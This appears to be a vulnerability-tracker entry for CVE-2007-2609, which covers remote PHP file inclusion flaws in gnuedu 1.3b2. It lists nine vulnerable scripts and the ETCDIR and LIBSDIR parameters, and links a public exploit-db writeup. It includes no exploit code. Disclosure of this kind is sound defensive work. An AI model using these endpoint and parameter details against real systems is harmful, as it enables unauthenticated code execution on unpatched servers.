CVE-2007-2609

gnu_edu 1.3b2 - Remote Code Execution via PHP File Inclusion

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2007-2609. PoCs published by GoLd_M.

AI-analyzed exploit summary This is a writeup detailing multiple remote file inclusion vulnerabilities in gnuedu 1.3b2. It lists various endpoints where the ETCDIR or LIBSDIR parameters can be manipulated to include arbitrary files.

Description

Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the (a) ETCDIR parameter to (1) libs/lom.php; (2) lom_update.php, (3) check-lom.php, and (4) weigh_keywords.php in scripts/; the (b) LIBSDIR parameter to (5) logout.php, (6) help.php, (7) index.php, (8) login.php; and the ETCDIR parameter to (9) web/lom.php.

Exploits (1)

exploitdb WRITEUP VERIFIED

by GoLd_M · textwebappsphp

https://www.exploit-db.com/exploits/3876

View Code ZIP pw:eip

This is a writeup detailing multiple remote file inclusion vulnerabilities in gnuedu 1.3b2. It lists various endpoints where the ETCDIR or LIBSDIR parameters can be manipulated to include arbitrary files.

Classification

Writeup 90%

Attack Type

Rce

Complexity

Trivial

Reliability

Theoretical

Target: gnuedu 1.3b2

No auth needed

Prerequisites: network access to the target application

MITRE ATT&CK